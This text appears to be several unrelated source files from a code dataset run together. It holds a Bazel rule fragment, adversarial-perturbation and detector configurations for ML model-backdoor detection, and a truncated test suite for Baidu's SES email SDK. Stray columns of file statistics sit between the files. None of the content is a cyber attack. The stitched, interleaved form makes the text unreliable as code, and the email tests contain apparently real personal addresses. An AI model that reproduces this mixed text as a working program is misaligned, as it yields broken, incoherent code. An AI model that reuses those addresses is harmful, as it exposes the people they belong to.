"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Headers/SwiftFmwkWithGenHeader.h", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/module.modulemap", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftdoc", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftinterface", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/x86_64.swiftdoc", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/x86_64.swiftinterface", "$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Headers/SwiftFmwkWithGenHeader.h", "$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Modules/module.modulemap", "$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftdoc", "$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftinterface", ], tags = [name], ) native.test_suite( name = name, tags = [name], )
53.406181
193
0.720952
2,684
24,193
6.074143
0.084575
0.08158
0.094032
0.067902
0.892412
0.863951
0.822057
0.79562
0.758633
0.72275
0
0.02391
0.178853
24,193
452
194
53.524336
0.796738
0.067127
0
0.55814
0
0.020672
0.614032
0.579663
0
0
0
0
0
1
0.002584
false
0
0
0
0.002584
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
0e1ea1fc4dc5532c5dd8a59e420d43e1d27eee6c
14,390
py
Python
detection/defs.py
perspectalabs/Iliad-GIFT
64799bbe5895bc3875f22a9a94d1031216d92dd4
[ "MIT" ]
1
2021-06-08T15:29:03.000Z
2021-06-08T15:29:03.000Z
detection/defs.py
perspectalabs/Iliad-GIFT
64799bbe5895bc3875f22a9a94d1031216d92dd4
[ "MIT" ]
null
null
null
detection/defs.py
perspectalabs/Iliad-GIFT
64799bbe5895bc3875f22a9a94d1031216d92dd4
[ "MIT" ]
null
null
null
################################# ATTACKS ####################################################### # att dict for untargeted L1 attack for round 3 r3_ut_l1_att = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 100, 'targeted': False}} # att dict for random targeted L1 attack for round 3 r3_rt_l1_att = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 100, 'targeted': True, 'random_targets': True}} # att dict for guessed targeted L1 attack for round 3 r3_gt_l1_att = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 100, 'targeted': True, 'random_targets': False}} # att dict for untargeted filter attack for round 3 r3_ut_filt_att = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 100, 'targeted': False}} # att dict for random targeted filter attack for round 3 r3_rt_filt_att = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 100, 'targeted': True, 'random_targets': True}} # att dict for guessed targeted filter attack for round 3 r3_gt_filt_att = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 100, 'targeted': True, 'random_targets': False}} # att dict for untargeted L1 attack for round 3, 300 images r3_ut_l1_att_x3 = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 300, 'targeted': False}} # att dict for random targeted L1 attack for round 3 r3_rt_l1_att_x3 = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 300, 'targeted': True, 'random_targets': True}} # att dict for guessed targeted L1 attack for round 3 r3_gt_l1_att_x3 = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 300, 'targeted': True, 'random_targets': False}} # att dict for untargeted filter attack for round 3 r3_ut_filt_att_x3 = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 300, 'targeted': False}} # att dict for random targeted filter attack for round 3 r3_rt_filt_att_x3 = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 300, 'targeted': True, 'random_targets': True}} # att dict for guessed targeted filter attack for round 3 r3_gt_filt_att_x3 = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 300, 'targeted': True, 'random_targets': False}} ################################# DETECTORS ####################################################### # untargeted L1 detectors r3_ut_l1_edet = {'att_dict': r3_ut_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_ut_l1_tdet = {'att_dict': r3_ut_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # random targeted L1 detectors r3_rt_l1_edet = {'att_dict': r3_rt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_rt_l1_tdet = {'att_dict': r3_rt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # guessed targeted L1 detectors r3_gt_l1_edet = {'att_dict': r3_gt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_gt_l1_tdet = {'att_dict': r3_gt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # untargeted filter-difference detectors r3_ut_filtdiff_edet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_ut_filtdiff_tdet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # random targeted filter-difference detectors r3_rt_filtdiff_edet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_rt_filtdiff_tdet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # guessed targeted filter-difference detectors r3_gt_filtdiff_edet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_gt_filtdiff_tdet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # untargeted filter detectors r3_ut_filt_edet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_ut_filt_tdet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # random targeted filter detectors r3_rt_filt_edet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_rt_filt_tdet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # guessed targeted filter detectors r3_gt_filt_edet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_gt_filt_tdet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} # untargeted L1 blur detector r3_ut_blur = {'att_dict': r3_ut_l1_att, 'det_class': 'BlurDetector', 'kwargs': {}} # random targeted L1 blur detector r3_rt_blur = {'att_dict': r3_rt_l1_att, 'det_class': 'BlurDetector', 'kwargs': {}} # guessed targeted L1 blur detector r3_gt_blur = {'att_dict': r3_gt_l1_att, 'det_class': 'BlurDetector', 'kwargs': {}} # batch norm detector r3_bn = {'det_class': 'BNDetector', 'kwargs': {}} r3_ut_filtdiff_tdet_x3 = {'att_dict': r3_ut_filt_att_x3, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}} r3_gt_l1_tdet_x3 = {'att_dict': r3_gt_l1_att_x3, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}} r3_ut_blur_x3 = {'att_dict': r3_ut_l1_att_x3, 'det_class': 'BlurDetector', 'kwargs': {}} r3_ut_l1_tdet_x3 = {'att_dict': r3_ut_l1_att_x3, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}} r3_rt_filt_tdet_x3 = {'att_dict': r3_rt_filt_att_x3, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}} r3_ut_filt_tdet_sc2 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_sc5 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_sc05 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_sc025 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}} r3_ut_filt_att_01 = {'type': 'filt', 'kwargs': {'eps': 0.01, 'nims': 100, 'targeted': False}} r3_ut_filt_att_003 = {'type': 'filt', 'kwargs': {'eps': 0.003, 'nims': 100, 'targeted': False}} r3_ut_filt_att_1 = {'type': 'filt', 'kwargs': {'eps': 0.1, 'nims': 100, 'targeted': False}} r3_ut_filt_tdet_att_01 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_003 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_1 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_01_sc2 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_01_sc5 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_01_sc05 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_01_sc025 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_003_sc2 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_003_sc5 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_003_sc05 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_003_sc025 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_1_sc2 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_1_sc5 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_1_sc05 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}} r3_ut_filt_tdet_att_1_sc025 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}} r3_ut_filt_edet_att_01_sc2 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_01_sc5 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_01_sc05 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_01_sc025 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_003_sc2 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_003_sc5 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_003_sc05 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_003_sc025 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_1_sc2 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_1_sc5 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_1_sc05 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_1_sc025 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_sc2 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_sc5 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_sc05 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_sc025 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_01 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_003 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_ut_filt_edet_att_1 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} import numpy as np r3_ut_inffilt_att = {'type': 'filt', 'kwargs': {'eps': 0.0003, 'nims': 100, 'targeted': False, 'ord': np.inf}} r3_ut_inffilt_att_01 = {'type': 'filt', 'kwargs': {'eps': 0.001, 'nims': 100, 'targeted': False, 'ord': np.inf}} r3_ut_inffilt_edet_att = {'att_dict': r3_ut_inffilt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} r3_ut_inffilt_edet_att_01 = {'att_dict': r3_ut_inffilt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}} ################################# ENSEMBLES ####################################################### ens14 = { 'det_class': 'LogRegEnsembleDetector', 'components': [ r3_ut_l1_tdet, r3_rt_l1_tdet, r3_ut_inffilt_edet_att_01, r3_ut_filt_tdet, r3_ut_filt_tdet_att_1, r3_ut_filt_tdet_att_01_sc2, r3_ut_filt_edet_att_01_sc2, r3_ut_filt_tdet_att_003_sc5 ]}
86.167665
175
0.668659
2,206
14,390
3.982321
0.035811
0.052817
0.08469
0.162322
0.953899
0.924872
0.90074
0.880592
0.865339
0.859192
0
0.064928
0.112717
14,390
166
176
86.686747
0.62312
0.075191
0
0
0
0
0.390887
0.00169
0
0
0
0
0
1
0
false
0
0.010309
0
0.010309
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
0e72d2100a64490b0018d146d3d32988f5ffe70a
16,175
py
Python
test/ses/test_post_email.py
yunfan/bce-sdk-python
00df2be78cd44373c3d99cd1bb69d17968f30d2b
[ "Apache-2.0" ]
22
2015-10-26T03:00:11.000Z
2021-09-08T09:30:51.000Z
test/ses/test_post_email.py
yunfan/bce-sdk-python
00df2be78cd44373c3d99cd1bb69d17968f30d2b
[ "Apache-2.0" ]
8
2018-07-18T02:47:09.000Z
2020-12-10T02:30:37.000Z
test/ses/test_post_email.py
yunfan/bce-sdk-python
00df2be78cd44373c3d99cd1bb69d17968f30d2b
[ "Apache-2.0" ]
14
2016-01-12T11:57:38.000Z
2021-03-10T03:35:12.000Z
#!/usr/bin/env python #coding:utf-8 """ @author wanglinqing01@baidu.com @date 2014/10/08 @brief post Email """ import os import sys import json import time import traceback _NOW_PATH = os.path.dirname(os.path.abspath(__file__)) + '/' _BCE_PATH = _NOW_PATH + '../' sys.path.insert(0, _BCE_PATH) import bes_base_case from baidubce.services.ses import client from baidubce.services.ses import exception as ses_exception from baidubce import exception class TestPostEmail(bes_base_case.BaseTest): def __init__(self): super(self.__class__, self).__init__() def setUp(self): time.sleep(1) def tearDown(self): pass #verified email:wanglinqing01@baidu.com, verified domain:126.com def test_post_email_normal(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' attach_list = ['1'] attach_list[0] = _NOW_PATH + 'bms_api_test.py' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], cc_addr=["wanglinqing2010@126.com"], bcc_addr=["zhuimeng_2006jsj@126.com"], subject="test post email normal", text="test ses python sdk email normal", attachments=attach_list, priority=1) #print resp assert resp.status == 200, 'status is not 200' def test_post_email_attachmentPdf(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' attach_list = ['1'] attach_list[0] = _NOW_PATH + 'personal_plan.pdf' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com", "zhangzheyuan@baidu.com"], subject="test post email pdf", text="test ses python sdk pdf", attachments=attach_list, priority=1) #print resp assert resp.status == 200, 'status is not 200' def test_post_email_attachmentPdfLongTitle(self): cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' attach_list = ['1'] attach_list[0] = _NOW_PATH + 'personal_plan_personal_plan_personal_plan_personal_plan_personal_plan.pdf' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email pdf long title", text="test ses python sdk pdf long title", attachments=attach_list, priority=1) assert resp.status == 200, 'status is not 200' def test_post_email_attachmentTxt(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' attach_list = ['1'] attach_list[0] = _NOW_PATH + 'bes_sdk_test.txt' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email txt", text="test ses python sdk txt", attachments=attach_list, priority=1) #print resp assert resp.status == 200, 'status is not 200' def test_post_email_attachmentDoc(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' attach_list = ['1'] attach_list[0] = _NOW_PATH + 'ses_api_v1.7.docx' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email doc", text="test ses python sdk doc", attachments=attach_list, priority=1) #print resp assert resp.status == 200, 'status is not 200' def test_post_email_ChineseSubject(self): cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="我是中文主题邮件", text="测试中文主题") assert resp.status == 200, 'status is not 200' def test_post_email_onlyCc(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' resp = cli.send_mail(mail_from=email, cc_addr=["wanglinqing2010@126.com"], subject="test post email only CC_addr", text=" email only cc_addr") assert resp.status == 200, 'status is not 200' def test_post_email_onlyBcc(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' resp = cli.send_mail(mail_from=email, bcc_addr=["wanglinqing01@baidu.com"], subject="test post email only bcc_addr", text=" email only bcc_addr") assert resp.status == 200, 'status is not 200' def test_post_email_emptyAttachments(self): #print self.host cli = client.SesClient(self.host, self.ak, self.sk) email = 'wanglinqing01@baidu.com' resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email without attachments", text="test ses python sdk without attachments") #print resp assert resp.status == 200, 'status is not 200' def test_post_email_emptySender(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail("''", to_addr=['wanglinqing01@baidu.com']) except exception.ServerError as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_emptyReceiver(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail('wanglinqing01@baidu.com', subject="test post email, no receiver", text="test ses python sdk, no receiver") except ses_exception.InvalidParam as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_receiverFormatInvalid(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01'], subject="test post email, receiver format invalid", text="test ses python sdk, receiver format invalid") except exception.ServerError as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_senderNotVerified(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail('wanglinqingtest@baidu.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, sender not verified", text="test ses python sdk, sender not verified") except exception.ServerError as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_senderDomainNotVerified(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail('wanglinqing2013@163.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, senderDomain not verified", text="test ses python sdk, senderDomain not verified") except exception.ServerError as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_senderFormatNotVerified(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail('wanglinqing01', to_addr=['wanglinqing01@baidu.com'], subject="test post email, sender format not valid", text="test ses python sdk, sender format not valid") except exception.ServerError as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_emptySubject(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01@baidu.com'], text="test ses python sdk, subject empty") except exception.ServerError as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_moreReceiver(self): cli = client.SesClient(self.host, self.ak, self.sk) resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01@baidu.com', 'wanglinqing2010@126.com'], subject="test post email, more receiver", text="test ses python sdk, more receiver") assert resp.status == 200, 'status is not 200' def test_post_email_receiverDuplicate(self): cli = client.SesClient(self.host, self.ak, self.sk) resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01@baidu.com', 'wanglinqing01@baidu.com'], subject="test post email, receiver duplicate", text="test ses python sdk, receiver duplicate") assert resp.status == 200, 'status is not 200' def test_post_email_longTitle(self): cli = client.SesClient(self.host, self.ak, self.sk) resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email long title long title long title long title long title long title long title long title long title long title long title long title long title long title", text="test ses python sdk, receiver duplicate") assert resp.status == 200, 'status is not 200' def test_post_email_domainVerified(self): cli = client.SesClient(self.host, self.ak, self.sk) resp = cli.send_mail('wanglinqing2010@126.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, sender not verified but domain verified", text="test ses python sdk, sender not verified but domain verified") assert resp.status == 200, 'status is not 200' def test_post_email_noParam(self): cli = client.SesClient(self.host, self.ak, self.sk) flag = False try: resp = cli.send_mail() except ses_exception.InvalidParam as e: flag = True print "it have an exception" tracemsg = traceback.format_exc() print e finally: assert flag == True, 'it should throw exception' def test_post_email_htmlFormat(self): cli = client.SesClient(self.host, self.ak, self.sk) resp = cli.send_mail('wanglinqing2010@126.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, html format", html='<html><body><div><h3 align=\"center\">资源总数统计</h3><table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\" align=\"center\"> <tr><th bgColor=\"426ab3\">type</th><th bgColor=\"426ab3\">count</th></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">15</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">RDS关系型数据库</td><td align=\"center\" bgColor=\"#9b95c9\">15</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">15</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">15</td></tr><tr> <td align=\"center\" bgColor=\"#c88400\">BMR百度MapReduce</td><td align=\"center\" bgColor=\"#c88400\">15</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">15</td></tr><tr> <td align=\"center\" bgColor=\"#769149\">SES邮件服务</td><td align=\"center\" bgColor=\"#769149\">15</td></tr><tr> <td align=\"center\" bgColor=\"#78a355\">SMS短信服务</td><td align=\"center\" bgColor=\"#78a355\">15</td></tr></table></div><div><h3 align=\"center\">资源数量top10用户统计</h3><table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" align=\"center\"> <tr><th bgColor=\"426ab3\">type</th><th bgColor=\"426ab3\">iam_account_id</th> <th bgColor=\"426ab3\">count</th></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">dcf5a8476ba443988322ed577d67b8ef</td><td align=\"center\" bgColor=\"#9b95c9\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">dcf5a8476ba443988322ed577d67b8ef</td><td align=\"center\" bgColor=\"#9b95c9\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" 